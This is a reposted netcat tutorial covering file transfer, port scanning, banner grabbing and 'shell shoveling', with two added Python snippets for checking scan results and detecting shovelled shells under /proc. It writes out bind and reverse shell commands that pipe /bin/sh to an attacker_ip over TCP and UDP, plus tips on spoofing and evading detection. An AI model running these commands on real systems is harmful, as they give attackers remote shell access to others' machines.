Netcat has a compile-time option (the -e flag) that makes netcat execute a program for the connecting or listening process. This is useful for sending a shell to the attacker. Also note that the switches may differ between platforms; for example, OpenBSD lacks the -p switch.
To download the Unix/Win version of the tool, check the links below. The great thing about this tool is that it is free and still has many uses. This paper will not cover everything netcat can do, so just explore its capabilities.
Unix: http://www.4shared.com/get/305121971/81e7c90c/nc110.html
Win: http://www.4shared.com/get/305124963/412c6953/nc11nt.html
Alternatives to netcat are listed below. Cryptcat encrypts traffic and could be useful to avoid detection, to transfer sensitive forensic data, or, for example, to encrypt the data while you do a penetration test against a customer over the Internet. SoCat is netcat on steroids; some like it, some don't.
http://farm9.com/content/Free_Tools/Cryptcat - Encrypted traffic with Blowfish
http://www.dest-unreach.org/socat/ - Netcat with extended design & features
We also want to mention stunnel, as it can be used standalone or in conjunction with netcat to check SSL-enabled services.
http://www.stunnel.org/ - Useful if you need to do stuff with HTTPS
Ok, now that we are done with this, let's check some examples of what this can be used for. We start with transferring files and move on to port scanning, banner grabbing and finally how to achieve an interactive shell, aka shoveling a shell.
Transferring files
When we want to send a file from one host to another with netcat, it is quite simple. We set up the receiving host to listen on a specific port and write all the data received into a file. We need to set a timeout so the listener notices when no more data is coming and can close gracefully.
-l = listens for incoming connections
-p = what port to listen on
-v = verbosity level, use twice for more information
-w = timeout in seconds
-n = don't resolve IPs (numeric addresses only)
On the sender's end we simply connect to the receiver's listening port and give the file as input. The file transfer goes smoothly as long as you remember to initiate the sending before the timeout.
Listener: nc -vvn -l -p 3000 -w 3 > file
Sender: nc -vvn xxx.xxx.xxx.xx 3000 < file
This however requires you to bind the spoofed IP to your interface; in Linux it can be done by typing 'ifconfig eth0:n spoofed_ip', where n is the next free alias. This will cause problems for the host you're spoofing, as you broadcast the same IP on the network. To perform similar tricks without causing as many problems, you could check out hping (http://www.hping.org).
Portscanning
It is also possible to do port scans with netcat using the -z flag (zero I/O mode), which only connects to and disconnects from a port. To perform a UDP scan, use the -u flag.
TCP: nc -vvn -z xxx.xxx.xxx.xxx start-end
UDP: nc -u -vvn -z xxx.xxx.xxx.xxx start-end
In the snippet below we attempt to scan TCP ports 79 to 81 to find open ports on a target. As you can see, closed ports report "Connection refused" and open ports report "open". UDP scan output is basically the same.
Code:
:~$ nc -vvn -z 10.0.0.1 79-81
(UNKNOWN) [10.0.0.1] 81 (hosts2-ns) : Connection refused
(UNKNOWN) [10.0.0.1] 80 (http) open
(UNKNOWN) [10.0.0.1] 79 (finger) : Connection refused
sent 0, rcvd 0
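The scan output above has a fixed line shape, so it can be parsed into an open-port inventory and compared with the ports a host is supposed to expose. This is an added example, not part of the original post: the transcript is a constructed sample copied from above, and the allow-list passed to unexpected_open is an assumed baseline.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample: the scan transcript shown above, as nc -vv -z prints it.
SAMPLE_SCAN = """\
(UNKNOWN) [10.0.0.1] 81 (hosts2-ns) : Connection refused
(UNKNOWN) [10.0.0.1] 80 (http) open
(UNKNOWN) [10.0.0.1] 79 (finger) : Connection refused
sent 0, rcvd 0
"""

# One result line: "(<host>) [<ip>] <port> (<service>) open" or "... : <error text>".
LINE_RE = re.compile(
    r"^\((?P<host>[^)]*)\) \[(?P<ip>[^\]]+)\] (?P<port>\d+) \((?P<svc>[^)]*)\)"
    r"(?: open| : (?P<err>.+))$"
)

def parse_nc_scan(text: str) -> List[Tuple[str, int, str, str]]:
    """Return (ip, port, service, state) per scan line; state is 'open' or the error text."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:  # skips the 'sent 0, rcvd 0' trailer and anything unparsable
            continue
        state = "open" if m.group("err") is None else m.group("err").strip()
        results.append((m.group("ip"), int(m.group("port")), m.group("svc"), state))
    return results

def open_ports_by_host(text: str) -> Dict[str, List[int]]:
    """Open ports per host, sorted ascending, ready to diff against an expected baseline."""
    inventory: Dict[str, List[int]] = {}
    for ip, port, _svc, state in parse_nc_scan(text):
        if state == "open":
            inventory.setdefault(ip, []).append(port)
    return {ip: sorted(ports) for ip, ports in inventory.items()}

def unexpected_open(text: str, allowed: Dict[str, List[int]]) -> Dict[str, List[int]]:
    """Open ports that are not in the allow-list, i.e. exposure the baseline did not plan for."""
    findings: Dict[str, List[int]] = {}
    for ip, ports in open_ports_by_host(text).items():
        extra = [p for p in ports if p not in allowed.get(ip, [])]
        if extra:
            findings[ip] = extra
    return findings
```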
Banner-grabbing
In banner-grabbing we send some specific strings, read from a file, to the target; if the port is open, the response is printed to your screen. In the example below we have included a basic for-loop for scanning multiple targets at a time, for example the machines we found in our port scan above.
Get.txt would contain "HEAD / HTTP/1.0" followed by two returns, or just two returns, which would also work on other ports. Iplist.txt would contain the IPs that you want to scan.
Win: for /f %i in (iplist.txt) do nc -vvn %i 80 < Get.txt
Unix: for f in `cat iplist.txt`; do nc $f 80 < Get.txt; done
Code:
:~$ for f in `cat iplist.txt`; do nc $f 80 < get.txt; done
(UNKNOWN) [10.0.0.2] 80 (http) : Connection refused
HTTP/1.0 200 OK
Server: Microsoft IIS/5.0
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 29 May 2003 09:35:08 GMT
Last-Modified: Sun, 18 May 2003 11:51:07 GMT
Accept-Ranges: bytes
Connection: close
Content-Length: 13640
By now you have probably realized that you could also send an exploit against the target by using netcat. When HTTPS is involved, you might want to look into stunnel, either by tunneling nc through it or by using stunnel itself:
(echo "HEAD / HTTP/1.0"; echo; ) | /usr/sbin/stunnel -c -r host:port
Shell Shoveling - TCP
This is probably the part that some have been waiting for: shell shoveling. We assume that you have managed to upload netcat to the target in some way, whether through a vulnerable web application or otherwise. We also assume you are able to issue commands on the target (how else could you use the netcat that is sitting there?). If there is no firewall protecting the target, or there is a misconfiguration in the firewall (e.g. allowing tcp/53 to all hosts), the attacker could put up a nc listener that shovels back an interactive shell the following way (assuming the -e flag has been compiled into the binary):
On the target: nc -l -p port -e shell (shell can be /bin/sh or cmd.exe, for example)
From the attacker: nc target_ip port
In the example below, the attacker connects to the listening netcat and starts issuing commands. As you see, the answers from the target come back directly, and the output can be a bit hard to read in the sense of where a command begins and where its output ends.
Code:
:~$ nc -vvn 10.0.0.1 3000
Connection to 10.0.0.1 3000 port [tcp/*] succeeded!
id
uid=1000(nobody) gid=1000(nogroup)
ls
vulnerable.cgi
nc
cd ..
ls
cgi-bin
index.html
mega_secret_document
If there is however a firewall in place that stops the attacker from connecting to a specific *free* port on the target system, they could try to get the target to connect back to them. This is possible only if the firewall allows certain outgoing connections:
On the attacker: nc -l -p port
From the target: nc -e /bin/sh attacker_ip port
In the case where nc has not been compiled with the -e option, there are still ways to shovel back a shell to the attacker. By piping stdin from one listener and stdout to another, the attacker gets one console for issuing commands and one console for the results:
On the attacker: nc -l -p port1
On the attacker: nc -l -p port2
From the target: nc attacker_ip port1 | /bin/sh | nc attacker_ip port2
Shell Shoveling - UDP
In the case where TCP is restricted, one has to check for possible UDP avenues. UDP is unreliable, but it can work, and it allows spoofing if there is need for it. After testing it, we concluded that it has to be used in the two-console way. It wasn't working without echoing an initial character:
On the attacker: nc -l -u -p port1
On the attacker: nc -l -u -p port2
From the target: echo "" | nc -u attacker_ip port1 | /bin/sh | nc -u attacker_ip port2
This way, however, requires two UDP ports to be available. There is another way where one port is enough. This usually means port 53, as it could be wrongly configured at the firewall level, allowing it both ways:
On attacker: nc -l -u -p 53
On target: nc -u -l -p 53 | /bin/sh | nc -u attacker_ip 53
From attacker: cat | nc -u target_ip 53
By using this way, the attacker again has a command console and an output console available. One should remember that if using ports under 1024, there must be access equivalent to system/root/administrator available. The UDP method will not work from behind a NATed environment.
End notes
As an end note, we would like to say: use your own imagination. Netcat is not called the Swiss Army Knife of networking tools for nothing.
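From the defender's side, the shovelled shells above all leave the same trace on the target: a shell process whose standard streams are a socket (the -e form) or a pair of pipes (the nc | /bin/sh | nc form) instead of a terminal. The Linux check below is an added example, not part of the original post; it reads the fd links under /proc/<pid>/fd, the list of shell names and the reason wording are assumptions, and the fd maps used to exercise it are constructed.

```python
import os
from typing import Dict, Optional

# Process names treated as shells; an assumed list, extend it for your platform.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "ash"}

def shell_wiring(comm: str, fds: Dict[int, str]) -> Optional[str]:
    """Classify a process from its name and the readlink targets of fds 0-2
    (as found under /proc/<pid>/fd). Returns None for a normally wired shell,
    or a reason string when the wiring matches the netcat patterns above."""
    if comm not in SHELLS:
        return None
    std = {fd: fds.get(fd, "") for fd in (0, 1, 2)}
    if any(target.startswith("socket:") for target in std.values()):
        # nc -e /bin/sh dup()s the connection onto the shell's stdio (bind or reverse)
        return "shell stdio is a socket"
    if std[0].startswith("pipe:") and std[1].startswith("pipe:"):
        # nc ... | /bin/sh | nc ...: both ends are pipes; noisier, scripts do this too
        return "shell stdin and stdout are pipes"
    return None

def read_proc_fds(pid: int, proc_root: str = "/proc") -> Dict[int, str]:
    """Resolve the fd 0-2 links of a live pid; unreadable entries become ''."""
    fds: Dict[int, str] = {}
    for fd in (0, 1, 2):
        try:
            fds[fd] = os.readlink(f"{proc_root}/{pid}/fd/{fd}")
        except OSError:
            fds[fd] = ""
    return fds

def scan_proc(proc_root: str = "/proc") -> Dict[int, str]:
    """Walk /proc and return {pid: reason} for shells wired like a shovelled shell."""
    findings: Dict[int, str] = {}
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"{proc_root}/{pid}/comm") as f:
                comm = f.read().strip()
        except OSError:
            continue  # process exited or is not readable by this user
        reason = shell_wiring(comm, read_proc_fds(pid, proc_root))
        if reason:
            findings[pid] = reason
    return findings
```

Run scan_proc() as root to see every process; fds of other users' processes are unreadable otherwise and are treated as empty.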
This post is not written by me. I just found it on net while browsing and hence added it here for my readers.